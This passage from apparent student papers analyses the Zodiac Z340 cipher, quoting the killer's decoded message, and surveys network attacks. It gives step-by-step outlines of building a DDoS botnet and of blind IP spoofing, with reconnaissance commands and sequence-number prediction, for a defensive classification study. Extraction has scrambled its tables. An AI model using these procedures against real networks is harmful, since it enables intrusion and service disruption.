http://www.mymoneyskills.pk/english/cd/uc/future.jsp
32. Smart Card Technology: Past, Present, and Future,
http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf
33. Smart Card Technology: Past, Present, and Future,
http://www.journal.au.edu/ijcim/2004/jan04/jicimvol12n1_article2.pdf
34. The Future of Smart Card Technology is Here Today or Is It?
http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-heretoday-or-is-it.html
35. The Future of Smart Card Technology is Here Today or Is It?
http://www.hidglobal.com/main/blog/2010/04/the-future-of-smart-card-technology-is-heretoday-or-is-it.html
36. Performing Relay Attacks on ISO 14443 Contactless Smart Cards using NFC Mobile
Equipment, http://www.sec.in.tum.de/assets/studentwork/finished/Weiss2010.pdf
37. Buy Thing with Mobile Phones? This May be Reality from Mid-2010,
http://www.todayonline.com/Singapore/EDC111026-0000201/Buy-things-with-mobilephones?-This-may-be-reality-from-mid-2012
38. TODAYonline | Singapore | Consortium to bring NFC shopping to Singapore by 2012,
http://www.todayonline.com/Singapore/EDC111025-0000502/Consortium-to-bring-NFCshopping-to-Singapore-by-2012
123
124
Analysis of Zodiac-340 Cipher
Yuanyi Zhou, Beibei Tian, Qidan Cai
National University of Singapore, Information System
Computing 1
13 Computing Drive
Singapore 117417
Abstract. With the ubiquity of personal computers and software, complex
arithmetic calculations become possible for different areas such as crime
solving, military analysis, and medical researchers. The reason is that computer
can run through a large number of possible combinations much faster than
human brains do. However, many encryption methods are designed in ways that
require an obscene amount of time to be encrypted. Even with the help of
computers, there are still some problems remaining unsolved due to their
complexity, one of them is, The Zodiac Z340 [1].
Keywords: The main purpose of our project is to decrypt the Zodiac-340 cipher.
1
Introduction
The serial killer, Zodiac, who terrorized Northern California in the late 1960s, sent
four ciphers to local press. These ciphers were claimed as the trace of his criminal
facts but only one of the four ciphers has been successfully decoded, keeping the
identity of the killer unknown. Nevertheless, a sketch (figure 1) of the Zodiac killer
was drawn based on witness testimonies [2]. Although the killer may have passed
away already, the process of solving his ciphers is still undergoing.
Figure 1.
125
2 Background
The objective of our research is to reduce the number of methods that could have
been used to encrypt the message. The first cipher that has been decoded is called
Z480. Among the remaining three, Z340 is the commonly tried one while the other
two have hardly attempted because of the brevity of the cipher messages. One is the
Z13, which is believed to reveal the name of the killer, the other is the Z32 sent
because the killer was upset that no one followed his wishes to wear the
buttons.
2.1 Finding from Z480
Z480 was encrypted as a homophonic substitution cipher. The plaintext is:
“I like killing people because it is so much fun It is more fun than killing
wild
game in the forrest because man is the most dangerous anamal of all To kill
somethinggives me the most thrilling experence It is even better than getting
your rocks off with a girl The best part of it is that when I die I will be
reborn in paradice and all the I have killed will become my slaves I will not
give you my name because you will try to slow down or stop my collecting of
slaves for my afterlife.”
Figure 2. Z408 part 1, sent to Vallejo Times-Herald on July 31, 1969, decoded on August 8,
1969
126
Figure 3. Z408 part 2, sent to San Francisco Chronicle on July 31, 1969, decoded on August 8,
1969
Figure 3. Z408 part 3, sent to San Francisco Examiner on July 31, 1969, decoded on August 8,
1969
2.2 Z340
A lot of conventions have been tried including: one-time pad, double transposition
columnar, polyalphabetic substitution, and homophonic substitution. However, none
of them have produced the result. There are also some creative ideas proposed such as
Mr. Farmer’s Japanese play “帝(Mikado)” thoughts, but none of them have been
verified [3].
127
Figure 4. Z340, sent to the San Francisco Chronicle on November 8, 1969
2.3 Z13
Z13 was considered to be the killer’s attempt to disclose his name.
Figure 5. Z13, sent to San Francisco Chronicle on April 20, 1970
2.4 Z32
The last cipher was sent after the killer found that no one was following his
instruction to wear the special
pursue a further muder.
buttons, which made him upset and decided to
128
Figure 6. Z32, sent to San Francisco Chronicle on June 26, 1970
3. Prior possible decryption methods
3.1 The Z340 seems to be a completely meaningless message
We firstly thought that Z340 is actually a completely meaningless message. But after
analyzing the whole case, we found that Zodiac seemed to be very proud of his
killing and being not caught by the police. He also continued to encrypt his
identification into the letters to challenge the whole world. Thus we drew the
conclusion that this Z340 is genuine and contains some important information about
this killer’s identification.
3.2 Web-based Dump analysis
Code-breakers have attempted to solve the Z340 for the past forty years with no
success. During these forty years, code-breakers have investigated the Z340 from
multiple perspectives: (1) It is a homophonic cipher similar to the Z408; (2) It is a
polyalphabetic cipher, which used an improvement from the Z408 encryption method;
(3) as a double transposition columnar, another improvement from the Z408
encryption method; and (4) as a one-time pad, the unbreakable encryption method
when used properly.
All of these methods have failed to deliver any meaningful conclusion during the 40
years. So our group conclude that due to the similarity of Z408 and Z340, Zodiac
maybe used the same way as Z408 to encrypt Z340, which is homophonic
substitution method. But because of the failing attempt for such long time, so maybe
he used an improvement method from the Z408 encryption method.
4. Analyzing the 340-cipher – what we did
Thus our group has been come up with and attempted the following ways to
interpret340 cipher: (1) use the partial break method and find the Identification
number of the zodiac killer in this cipher; (2) the Holy Bible method; (3) analyzing
the special features of 340-cipher. (4) The 340-cipher was written using the Zodiac
signature that was segmented into 12 equal 30-degree slices.
129
4.1 Partial break method
As the Zodiac killer claimed, the cipher contains his identity. Thus we guess that the
cipher should contain an Identification Number of the Zodiac killer. That is the reason
why we come up with the first method. We do some research on the format of the
identification number of Americans in 1960s. We found that the identification
number, known as Social Security Number (SSN), contains nine digits [4].
Before we continue, we should introduce a website first. When we search the
information of zodiac ciphers, we found a quite useful website, which is
“http://oranchak.com/zodiac/webtoy/”. We will refer it as “zodiac tool” in this report.
By using this zodiac tool, we can replace any of the 62 zodiac symbols with a chosen
English character. What we did is just replacing any symbols with frequency lower
than 2% (not including A) with “A” and we tried to find a string contains at least nine
“A”s appear consecutively. Those with higher frequency have lower possibility to be
numbers, which is the reason we tried lower frequency symbols. Thereafter, we got
the longest string with five “A”s consecutively as it shows in the figure 7. This means
that the Z340 probably not contains SSN and this method doesn’t work to break the
Z340.
Figure 7, the result we get using the zodiac tool
130
4.2 Holy Bible method
We noticed there is a sentence “when I die I will be reborn in paradice” which likely indicates
the killer might have a belief in God or at least the resurrection of the body, and the life
everlasting, although what he did was horrible. As a killer, he might consider himself as a
“Moses” who could kill people according the “words” from God. The “words” might be what
he read from the Holy Bible and chose to show the public that he was following God’s
commands. This religious link gave us a deep thinking about how the killer was trying to
encrypt the message. We got two possible ways: 1) the cipher contains the names of the books,
chapters and verses; 2) only those
symbols are useful to give meaningful result.
For the first way, it will take a long time to decrypt the cipher because we are not familiar with
all the books of the Holy Bible. With the limited time, we choose to try the second one. We
mention the first possible way in this report to help people who have a better understanding of
the Holy Bible to decrypt the cipher.
For the second way, what we did is trying to use the zodiac tool to encrypt the
By checking the zodiac tool, the
symbols.
symbol has the highest frequency, which means the
symbols probably contain the useful information. However, when we replaced the
symbols with “J”, we got a map of “J” strings.
Figure 8.
131
We saw the “J” string with randomness but the positions were readable. We believed
that the positions of each “J” to indicate the chapters and books. For example, the top
left “J” with position (1, 2), which indicate the book 1 and chapter 2, i.e. Genesis
chapter 2.[5]
Verse 1: Thus the heavens and the earth, and all the host of them, were finished.
And the second “J” with the position (2, 5) indicates the book 2 and chapter 5, i.e.
Exodus chapter 5.
Verse 1: Afterward Moses and Aaron went in and told Pharaoh, “Thus says the
LORD God of Israel: ‘Let my people go, that they may hold a feast to Me in the
wilderness.’”
By using this method, we believe the Z340 contains only religious information from
the killer, which were chosen by the killer to “educate” his “slaves”. Therefore, it will
not reveal the identification of the killer. However, this is just one of the approaches
to solve the cipher which cannot be verified.
4.3 Analyzing the special features and IC
Let’s take a closer look at the 340-cipher. We exam the Symbol density map, the Row
repeat map, column repeat map and highlight first occurrences symbols.
Figure 9: Symbol density map
Figure 10: Row repeat map
132
Figure 11: Column repeat map
Figure 12: Highlight first occurrences of symbols
And the following are the Index of Coincidence:
Index of coincidence, Entropy, Chi2: IoC: 0.0194.
By row: 0 · 0 · 0 · 0.029 · 0.007 · 0.007 · 0 · 0.007 · 0.007 · 0.015 · 0 · 0 · 0 · 0.015 · 0 ·
0.007 · 0.015 · 0.022 · 0.007 · 0 (Average: 0.007).
By col: 0.005 · 0.026 · 0.026 · 0.016 · 0.011 · 0.042 · 0.011 · 0.011 · 0.021 · 0.021 ·
0.032 · 0.016 · 0.021 · 0.026 · 0.011 · 0.016 · 0.021 (Average: 0.017). Ratio to IoC of
random letters: 0.5468.
Entropy: 5.7453.
By row: 0.491 · 0.491 · 0.491 · 0.471 · 0.485 · 0.485 · 0.491 · 0.485 · 0.485 · 0.479 ·
0.491 · 0.491 · 0.491 · 0.479 · 0.491 · 0.485 · 0.479 · 0.473 · 0.485 · 0.491 (Average:
0.485).
By col: 0.571 · 0.548 · 0.551 · 0.563 · 0.565 · 0.537 · 0.565 · 0.565 · 0.553 · 0.553 ·
0.545 · 0.559 · 0.553 · 0.551 · 0.565 · 0.559 · 0.557 (Average: 0.473).
Chi2: 0.4039.
By row: 15.248 · 15.248 · 15.248 · 12.541 · 14.345 · 14.345 · 15.248 · 14.345 · 14.345
· 13.443 · 15.248 · 15.248 · 15.248 · 13.443 · 15.248 · 14.345 · 13.443 · 12.54 · 14.345
· 15.248 (Average: 14.436).
By col: 16.72 · 13.177 · 14.063 · 15.835 · 15.834 · 12.292 · 15.834 · 15.834 · 14.063 ·
14.063 · 13.177 · 14.949 · 14.063 · 14.063 · 15.834 · 14.949 · 14.949 (Average:
12.485).
133
Figure 13.
There are two repeated trigrams in the 340 cipher
and
,
both of which appear twice. The most frequent digrams are as follows, each
appearing three times:
,
,
,
With some seven other diagrams repeated twice. The ‘+’ symbol is the most
frequently occurring symbol, with 24 occurrences in all, it far exceeds all other
symbols in frequency. The average number of characters between each repetition of a
symbol is 76.4. The average number of repeated symbols per line is 0.9.
Comparison between the first cipher and the 340-cipher offers some interesting facts.
They are both the same width of 17 columns. Computing the index of coincidence
for both cipher 340 and the first cipher, we get an answer of 0.02 for both of them,
which suggests that they are very similar in design. The difference in the number of
characters is interesting, as the 340-cipher has a larger cipher alphabet in fewer
characters. This suggests that if the homophonic format was maintained, the alphabet
was expanded to provide greater security.
To examine some specifics, we looked at the two repeated trigrams
. All of these symbols have a higher than average occurrence (10 to
and
12). In fact ‘F’ is the most frequently occurring symbol after ‘+’. This would
indicate that their plaintext counterparts appear less frequently in English, assuming
that cipher 340 is still some type of homophonic cipher. The lower frequency letters
in English are starting from the bottom: Z, J, X, Q, K, V, G, B, Y, W, M, F, P, U…,
so to match these, it would be useful to recognize a trigram from these lesser used
letters.
134
Examining the behavior of the symbol F, it is followed by the symbol ‘B’ three times,
but preceded by the symbol ‘B’ once. It is also followed as well as preceded one time
each by the symbol ‘backwards K’. Since ‘F’ is both followed and preceded by ‘B’,
let’s examine the behavior of ‘B’. It is also both followed and preceded by another
symbol than ‘F’, ‘backwards Y’. This ‘backwards Y’ only appears five times in the
text, suggesting that it might be a very high frequency letter. So these two letters both
followed and preceded by two other symbols. This rules out ‘q’, which is always
followed by the same letter, ‘u’, in English (assuming no intentional misspelling).
We tried numerous combinations of replacements in the cipher, and each seemed to
hold some promise, but none of them proved sound upon further investigation.
One point that we believe deserves further investigation is the phenomenon noted
earlier in the first cipher, and its possible meaning for the second cipher. I noted that
the letter ‘A’ had been encrypted using two symbols that also encrypted ‘S’. Note
that one encryption for ‘A’ is the letter ‘S’. My reasoning on this point is that, rather
than this being a mistake, there is the possibility that this was a deliberate double
encryption. The ‘A’ was encrypted as ‘S’, and then the ‘S’ was then encrypted again
into the two triangles. Also note that one of those symbols is the triangle with a dot in
the middle, which has a role to play in the fantastical analysis. We assert that perhaps
there are multiple levels of encryption in the second cipher.
4.4 Second attempt – Zodiac signature
The three methods were our first attempt for solve the Z340. However, as all the three
methods didn’t work, we decided to do more research on how the Z408 is cracked.
The Z408, which was sent on August 1st, 1969, was encrypted as a homophonic
substitution cipher. One week later, on August 8th, 1969, Donald and Bettye Harden,
residents of Salinas California, successfully decrypted the cipher. The Harden's
method was based on their deduction that the message would contain the words “kill”
and “I” [6].
We think that the Z340 is also encrypted by the homophobic method and this is also
believed by lots of code-breakers who are trying to solve the cipher. However, the
Z408 is decrypted in one week, so if the Z340 is encrypted in exactly the same way as
the Z340, the Z340 shouldn't remain a myth for more than 40 years. Besides, because
the Z340 is sent three month later after the Z408 is broke, the zodiac killer should
have come up with more methods to make the Z340 even harder to break.
Base on the above analysis, we conclude that, the Z340 is still encrypted by the
homophobic but with an improved and even harder method. When we read an article
about how the author thinks the Z340 should be solved, we just got inspired. May be
the Zodiac killer change the order of the characters and we should read the Z340
along the way of the zodiac signature. That is we should read the cipher by circle
instead of from left to right and from top to bottom. Figure 15 shows the idea more
clearly.
135
Figure 14.The Zodiac signature
Figure 15. The way we read the cipher
Each of us try to break Z340 based on this idea, however, none of us get any useful
information. It will have a lot of work to do as we have to use the brute force method.
Because of the time limit and lack of man power, finally, we give up breaking Z340
in this way.
5. Related work
There is lots of work being done for the cipher Z340, and we value one website a lot,
zodiac tool, which is actually being introduced in the part 4.1. We will discuss more
details about this website: http://oranchak.com/zodiac/webtoy/. Mainly, there will be
three parts: the purpose of the website, what functions the website can perform and
the results have been got using the website.
The purpose: The website is to help code-breakers break the cipher Z340 using the
simple monoalphabetic homophonic substitution method. The zodiac tool developer
believes that Z340 is encrypted by the homophonic substitution method because Z408
is broke using this method.
Functions: Figure 16 is how this website looks like and it mainly contains seven parts.
With these seven parts, we can change the any symbol to any English alphabet (can
be done in part 1 and part 2) as well as automatically get the corresponding letter
frequency (as it shows in part 6) after the changes being done. Beside, we will get the
decoded ciphertext automatically to make the ciphetext more readable (as it shows in
part 4). The website even can find the words (as it shows in part 4), which make it
easier to see if we get some useful results.
136
Results: with the help of this tool, there is still nobody successfully break Z340.
However, with some substitution, we can get the words like halloween, killing, you,
next, die, zodiac.
Figure 16. The website: zodiac tool
6. Summary
To break cipher Z340, we mainly use four methods: the partial break method and find
the Identification number of the zodiac killer in this cipher, find clue from the Bible,
read the cipher by the way of the zodiac signature and analyzing the special features
and IC of 340-cipher. However, none of these four methods works to break the cipher
Z340.
The cipher Z408 is broke in only one week, why cipher Z340 remains a myth for
more than 40 years? Is that just because zodiac killer increase the number of symbols
or he improved his encrypt method? It seems that the advanced technology don’t help
a lot in breaking this cipher. Maybe, we will come up with a strange idea to break this
cipher during a tea break and it turns out this is just the answer!
Reference:
1. Voigt, T. (November 4, 2007). Zodiac Letters. Retrieved October 10, 2011 from
http://www.ZodiacKiller.com/Letters.html
137
2. Wikipedia The Free Encyclopedia. (October 5, 2011). Zodiac Killer. Retrieved October 10,
2011 from
http://en.wikipedia.org/wiki/Zodiac_Killer
3. Farmer, C. (2007). The Zodiac 340 Cipher Solved. Retrieved October 10, 2011 from
http://www.opordanalytical.com/articles1/zodiac-340.htm
4. Wikipedia The Free Encyclopedia. (October 6, 2011). Social Security Number. Retrieved
October 10, 2011 from
http://en.wikipedia.org/wiki/Social_Security_number
5. Holy Bible (New King James Version,1982). Thomas Nelson, Inc.
6. Thang D. (December, 2007). Analysis of the Zodiac Z340. A Project Report Presented toThe
Faculty of the Department of Computer Science, San Jose State University. Page 17.
138
The sampler of network attacks
Guang Yi Ho, Sze Ling Madelene Ng, Nur Bte Adam Ahmad, and
Siti Najihah Binte Jalaludin
School of Computing, National University of Singapore, Computing 1, 13
Computing Drive, Singapore 117417, Republic of Singapore
{u0907064, u0907056, u0807104, u0907055}@nus.edu.sg
Abstract. Attacks over the years have become both increasingly numerous and
sophisticated. Computer and network systems fall prey to many attacks of different
forms. To reduce the risks associated with such attacks, it becomes imperative that
organizations and individuals understand and assess them, and make prudent
decisions regarding the defenses to be in place. Understanding the network attack
characteristics allows for better decisions made in selecting the appropriate barriers.
To develop these understandings, we have chosen to classify four network attacks in a
comprehensive manner , namely Distributed denial of service attack, Man in the
middle attack, Spoofing and Keylogger attacks. This paper focuses on the
provisioning of the categorization of the above network attacks, thus providing a
greater comprehension of the attacks in terms of the different dimensions. In addition
to that, this paper will also explore the case on Sony‟s latest attack, in relation to the
network attacks.
1. Introduction
The evolution of technology has allowed most of the organizations to conduct their
operations over the Internet, regardless of their geographic location. However, with
the power of the Internet, it has led to an increase in system attacks over the years.
As seen in Fig.1 (Refer to Appendix A: System Attacks Frequency), most of the
organizations are susceptible to system attacks. In addition to viruses, worms and
Trojans, the next top three attacks that organizations face are malware, botnets and
web-based attacks. We will be discussing on the in-depth analysis of these attacks
later in this report.
Besides that, the motivation of an attacker has also evolved over the years. Ten
years ago, it was mainly driven by the curiosity of learning more about the system.
Over the years, attackers are becoming more aggressive, and motivations are leaning
more towards financial gains.
In this report, four different types of systems attacks will be discussed, namely
Distributed Denial of Service, Man-in-the-middle, Spoofing and Keylogger attacks.
Each of the attacks will entail its history, the motivations behind it, and how it is
carried out. Thereafter, there will be a system classification of the network attacks
according to different factors, followed by the discussion of a case study on Sony’s
attack. The term “attacker”, “intruder” and “hacker” will be used interchangeably
throughout this report.
139
2. Our Approach
We will show how the four system attacks can be classified into four different
areas; CIA Triad Classification, Scale of Severity Classification, Probability of
Occurrence Classification and Probability of Detection Classification. Three out of
four classifications are based on two methodologies; National Institute of Standards
and Technology (NIST) Risk Management Guide and Michael Whitman‟s Risk
Assessment Methodology. The CIA classification is based on the CIA Triad
Information Security Model.
The Probability of Occurrence and Probability of Detection classification is based on
NIST‟s Risk Assessment Methodology. The objective of this classification is to
measure the probability of such attacks using a qualitative approach. Since it will be
difficult to justify quantitatively how often does an attack occur and how could it be
detected easily, the NIST approach provides a basis to derive the probability based on
our analysis on the environment of the system attacks. The Scale of Severity
Classification is based on Michael Whitman‟s risk assessment methodology. Michael
Whitman‟s approach uses quantitative measures such as weighted scores to evaluate
the value of a criteria. For example, the weighted score of each criteria allows us to
calculate to the total weighted score to determine the overall ranking.
3. Types of Attacks
3.1 Distributed Denial Of Service
Distributed denial of service (DDoS) attacks involves many computers and
connections, such that the target server will be flooded by many requests. DDoS
attacks employ standard TCP/IP messages, which takes advantage of the weaknesses
in the IP protocol stack, to disrupt Internet services. Many DDoS attacks are sourced
from bot networks or botnets. Those defenses that are built upon observing large
packets coming from a single destination will crash, as DDoS attacks come from all
over the networks.
Historical perspective. The first DDoS attack occurred in August 1999, when a
DDoS tool called Trinoo was deployed in at least 227 systems. This flooded a single
Minnesota computer and the system was down for more than 2 days. Yahoo! also
became a victim of a DDoS attack, where it became inaccessible for 3 hours, and it
suffered a loss amounting to about $500,000. This caused them to either stop
functioning completely or experienced a significantly slow system. One of the
worrying issues about DDoS attacks is that the handler gets to choose the location of
the agents.
Motivations. DDoS attacks are launched not to steal sensitive information, but to
render target systems inaccessible, preventing legitimate users from using a specified
network resource. Other incentives include political “hacktivisim” or just plain old
ego.
How DDoS is carried out. The following steps are as follows:
Step1: An intruder searches for systems on the Internet that can be compromised,
by using a stolen account on a system with a large number of users or via inattentive
140
administrators. Many of such systems are often found on university campuses. (Refer
to Appendix B: Distributed Denial of Service, Fig.2)
Step 2: The intruder loads the compromised system with hacking tools such as
DDoS programs. This compromised system(ie. DDoS master /handler) finds other
Internet hosts that it can also install its DDoS daemons (agent/zombie) on. The
daemon is a compromised host that runs a special program. The intruder searches for
systems running services that have security vulnerabilities via scanning large ranges
of IP network address blocks. This is when the initial mass-intrusion phase will
happen.
Step 3: The subsequently exploited systems loaded with the DDoS daemons will
carry out the actual attack (Refer to Appendix B Distributed Denial of Service,
Fig.3). The zombie program can be planted on the infected hosts via an attachment to
spam email. Communication from the zombie to its master can be hidden by using
standard protocols such as HTTP, IRC, ICMP or even DNS.
Step 4: The intruder maintains a list of owned systems, consisting of compromised
systems with the agents. The actual DDoS attack phase occurs when the intruder runs
a program at the master system. This will inform the agents to start the launch of the
attack to the victim. (Refer to Appendix B Distributed Denial of Service, Fig.4)
3.2 Man-in-the-Middle
Man-in-The-Middle(MITM) attack is classified as a type of active attack is where an
attacker intrudes between the communication of two victims to intercept data being
transferred, and inject false information.
Users are usually unaware if they are really visiting the real website. It takes quite
a great deal of skill to differentiate between an authentic and a bogus website. The
attacker establishes a connection with their victims, and messages will be relayed
between the attacker and the victim, causing the victim to believe that they are
communicating within a private connection, when in fact the attacker is actually
controlling and monitoring their activities with malicious intention.
Historical Perspective. One of the earliest known MITM attack was carried out by
the Aspidistra transmitter during World War II. Aspidistra is a British medium wave
radio transmitter used for black propaganda and military deception. It intruded into
German radio frequencies by transmitting on its frequencies when German radio
transmitters were switched off during air raids and retransmitting the network
broadcast as if it was still broadcasting. Thus making it sound like it came from
official German sources. The Aspidistra transmitter modified news broadcasts by
inserting false content and pro-Allied propaganda, causing panic and confusion
among listeners.
Motivations. The motivation behind a MITM attack is to access accounts with
unauthorized access and take advantage of privileges to modify or steal data, to be
used for their financial gain. Attackers also perform actions to deny authorized users
from using the online services and resources.
How MITM is carried out. A common MITM attack is the Phishing Attack on
Web-Based Financial System.
Phishing Attacks on Web-based Financial Systems. Phishing aims to gain
control of customer‟s information by behaving as a proxy between the customer and
the real web-based application. The affected groups of users of are usually E-business
141
services and financial systems where identity thefts are performed on unsuspecting
customers. The attacker aims to intercept between a customer and a merchant bank by
enticing the customer to enter their credentials on a bogus bank website. The
customer will enter their credentials and the one-time code from a token (if website
requires two-factor authentication). Even when the two-factor authentication approach
is in place, it provides no such protection against the phishing attack.
All these are done with the customer completely unaware that a MITM attack is
ongoing. The attacker will have the ability to use the credentials on the real banking
website to access the customer‟s bank account. The attacker is now able to carry out
malicious activities such as performing fraudulent transactions directly with the bank.
Future transactions will direct the customer to the malicious proxy server instead of
the real bank‟s server, which results in DNS Cache Poisoning.
Both HTTP and HTTPS communications are vulnerable to phishing attacks.
Attacks on HTTP connections are carried out with the attacker establishing a
simultaneous connection between the customer and the real site. The attacker proxies
all the communications between the customer and the bank in real-time. In the case of
HTTPS connections, the attacker‟s proxy will establish an SSL connection with the
customer and create an SSL connection between itself and the bank‟s server, allowing
the attacker to capture and „record all traffic in unencrypted state.
3.3 Spoofing
Spoofing is a situation whereby a person or a program mimics to be someone by
modifying the data to gain unauthorized access to the system. Spoofing has been
“increasingly popular across the wireless network and they are usually the generator
of all other attacks in the wireless network.” Some of the common types of spoofing
are email spoofing, ARP Spoofing, Content Spoofing and IP Spoofing. The scope of
this report will be focusing on IP Spoofing.
IP Spoofing. IP Spoofing is a “hijacking technique” whereby it allows the attacker
“to gain unauthorized access to the computers by sending messages to a computer
with an IP address indicating that the message is sent from a trusted host.”It can be
done simply by replacing the source of the message with an internal or trusted IP
address.
IP Spoofing can be used to launch various attacks. Some of the common attacks are
blind spoofing, non-blind spoofing and denial of service attacks.
Blind Spoofing. In blind spoofing attack, the attacker, located outside the network,
“sends multiple packets to the target computer to obtain and analyze the different
sequences.” This allows the attacker to “predict the next number sequence”, and
deceive the system by “injecting the data into the stream of packets without having to
authenticate him/herself.”1
Denial of Service Attack. “To prevent a large-scale attack on a machine or a
group of machines from being detected, IP Spoofing is commonly used for DoS
attacks.” By spoofing the IP address, it can “extend the DoS attack as long as possible
by increasing the difficulties of tracing the source of the attack.”
142
Historical Perspective. In the 1980s, the concept of IP Spoofing was initially
discussed in the academic circles. The author of the April 1989 article entitled
“Security Problems in the TCP/IP Protocol Suite”, S.M Bellovin of AT & T Bell labs,
is one of the first who have identified IP spoofing as a real risk to computer network.
In the article, S.M Bellovin “describes how the creator of the now infamous Internet
Worm, Robert Morris, figured out how TCP created sequence numbers and forged a
TCP packet sequence.”
Motivations. IP Spoofing is being employed “to commit online criminal activity”
such as spamming and denial of service (DoS) attacks. These attacks involve large
amounts of information transmitted over the network. With the use of the bogus IP
address as the source of the message, it will hide the origin of the message, preventing
the attacker from being detected. Also, IP Spoofing is being employed to breach
network security. Due to the use of “bogus IP address that mirrors one of the
addresses on the network”, logging on to the network no longer requires any
username and password. Attacker can easily “bypass any authentication method and
illegally access the network.”
How IP Spoofing is carried out.
Step 1: Detecting a Trusted System. The attacker must first identify the system
that the target system trusts and establish a trusted relationship based on the
authentication by IP address. This can be done via using the commands such as
rpcinfo –p and showmount –e, through social engineering and method of brute force.
Step 2: Blocking a Trusted System. Once the trusted system has been identified,
the attacker must proceed to block it by performing the SYN Flooding DoS attack on
it, resulting in the available memory on the trusted system to be completely taken up.
This prevents the trusted system from responding to any SYN/ACK packet sent from
the victim system.
Step 3: Getting the Final Sequence Number and Predicting the Succeeding
Ones. After the trusted system has been blocked, the attacker must proceed to obtain
the sequence number of the target system. To obtain the sequence number of the
target system, “the attacker can connect to port 23 or port 25 (TCP Ports) just before
the launch of the attack and obtain the sequence number of the last packet sent by the
target system.”
Step 4: The Actual Attack. Once the sequence number has been obtained, the
attacker is ready to launch the actual attack. The attacker must first send a SYN
packet attached with the spoofed IP address to the victim system. “This SYN packet
is addressed to the rlogin port (513) and it requests for a trust connection to be
established between the victim system and the trusted system.” The victim system
will respond to the SYN packet by sending a SYN/ACK packet back to the trusted
system. SYN/ACK packet sent by the victim system will be discarded as it has been
blocked. The attacker can then send an ACK back to the victim system. This ACK
message is designed such that it consists of a spoofed address that makes it seem to
originate from the trusted system. “It also includes an ACK number whose value is
the predicted sequence number plus 1.” If everything is successful, a trust relationship
would be established between the victim and the attacker. (Refer to Appendix D:
Spoofing, Fig. 6)
3.4 Keylogger
143
Keylogging attack, also known as keystroke logging attack is a type of malware
where malicious attackers use a keylogger to log keystrokes on a victim‟s computer.
The keylogger can come in the form of a hardware device or a program to steal
sensitive information and track user input, including the URL that users visited.
Keylogger attacks are a threat to many organizations and personal activities as
information can be captured before the encryption is being performed (Refer to
Appendix E: Keylogger, Fig.9).
Keyboard is still the main method to enter the input on the computer. Thus, the
attacker can easily obtain valuable information by recording the keystrokes.
Furthermore, attacker can easily predict users‟ behavior via the sequence of typing
order when the user logs into their email account. The keystrokes are then stored in a
log file on the compromise machine and sent to the attacker without the user knowing
it. (Refer to Appendix E: Keylogger Fig.10)
Historical Perspective. It was known that the early keylogger program was written
by Perry Kivolowitz when he was still an undergraduate. The source code was posted
to Usenet news groups on November 17, 1983. [34] Although attackers use keylogger
to carry out cyber crimes, it can be used for law enforcement purposes.
Motivations. The purpose is to steal sensitive information such as username,
password, credit card number, bank account number and others, in order to have
access to the organization‟s confidential information. Blackmailing of the
organization is often the case once attackers have access to such information.
How Keylogging is carried out. Common keyloggers include Software keylogger
and Hardware keylogger. Each will have its own way of how keylogging is carried
out.
Software Keylogger. There are three types of software keyloggers; kernel based,
hook based and user space. It captures data remotely and affects large number of
machines by installing the program into the computer. When users open the file that
has already been infected with the virus, the program will then be installed into the
computer automatically without the users noticing it, capturing the keystrokes
between the keyboard interface and the Operating System (OS).
Hardware Keylogger. Hardware keylogger uses a connector, such as PS/2 (Refer
to Appendix E: Keylogger, Fig.11) or a USB keylogger (Refer to Appendix E:
Keylogger, Fig.12) to connect between the keyboard and the computer to capture
keystrokes. Once the keylogger is connected to the machine, it will start recording the
keystrokes, and store it in the device‟s own hard drive. Hardware keylogger requires
physical access to input the connector to the machine itself and to retrieve the logged
data.
4. System Attacks Classifications
4.1 CIA Classification (Information Security Model)
The CIA Triad security model is used to identify which component of the CIA Triad
Security Model is affected by the system attacks. Classifying the system attacks under
the CIA triad gives us a better understanding on the security components that were
breached. A brief definition of the CIA components are stated below.
144
Confidentiality: Sensitive and confidential information is protected from unauthorized
access
Integrity: Data is protected from modification and deletion
Availability: Systems, resources and services must be available at all times when
needed
System
Attacks
Distributed
Denial Of
Service
(DDoS)
IP Spoofing
Keylogging
CIA Classification
CIA
Reasons
( Confidentiality,
Integrity,
Availability)
Breach of Availability In our opinion, DDoS attack breaches
availability of the data. This is because once
the DDoS attack is being successfully
launched, the target server will be flooded with
requests and hence cause the server to be
inoperable. The service or data will be
unavailable, and thus prevent those legitimate
users from using a specified network resource
such as a website, web service, or computer
system.
Breach of
Confidentiality,
Integrity and
Availability
Breach of
Confidentiality
In our opinion, IP Spoofing breaches
confidentiality, integrity and availability of the
data. Firstly, integrity is breached because IP
Spoofing- based attack usually requires the
attacker to modify the source of the message to
make it appear to have originated from a
trusted source. Secondly, confidentiality is
breached because once the attacker has
successfully launched any IP Spoofing-based
attack, they will be able to gain authorized
access to any computer system or network and
hence enable them to obtain many confidential
information. Lastly, availability is breached
because IP Spoofing can be used to launch
denial of service attack. With the use of a
spoofed IP Address, it increases the difficulty
in detecting the source of the attack.
In our opinion, keylogging breaches the
confidentiality of the data. This is because
once keylogging attack is successfully
launched, the attacker will be able to log the
various keystrokes on the victim computer and
hence enable them to gain unauthorized access
145
Man-InThe-Middle
(MITM)
Breach of
Confidentiality,
Integrity and
Availability
to their confidential information.
Confidentiality is breached because
communication among computers can be
eavesdropped by the attacker. By
eavesdropping, the attacker will be able to gain
unauthorized access to the data communicated
across the different system. Secondly, there is
integrity breach as the attacker can intercept a
communication and modify the message
before sending back to the destination.
Availability is also breached as the attacker
has the ability to intercept, destroy/modify the
message, with the aim of ending the entire
communication among the different
computers.
4.2 Probability of Occurrence Classification
This classification identifies how likely system attacks will be carried out. The
probability of occurrence are expressed in qualitative terms and can be described into
three qualitative categories; „Frequent‟, „Occasional‟ and „Remote‟. The definition of
the three probabilities are explained below.
Frequent: The system attack may occur once or several times
Occasional: The system attack may occur once or a few times
Remote: The system attack is unlikely to occur but cannot rule out possibility of
occurrence
System
Attacks
Distributed
Denial of
Service
(DDOS)
IP Spoofing
System Attacks and its Probability of Occurrence
Probability of
Reasons
Occurrence
In our opinion, DDoS attack occurs quite frequently
as it can be performed easily with minimum
Frequent
resources and expertise needed. Due to the growing
trend of do-it-yourself attack tools and botnets for
hire, even a computer novice can execute a
successful DDoS attack. With the ease of executing
this attack and the amount of damage this attack can
bring, it gives the attackers a greater incentive to
launch the DDoS attack.
Remote
In our opinion, IP Spoofing-based attack does not
occur frequently but it does occur a few times. This
is due to the high complexity of the attacks
where it usually involves a large number of
resources and high technical knowledge from the
146
Keylogging
Frequent
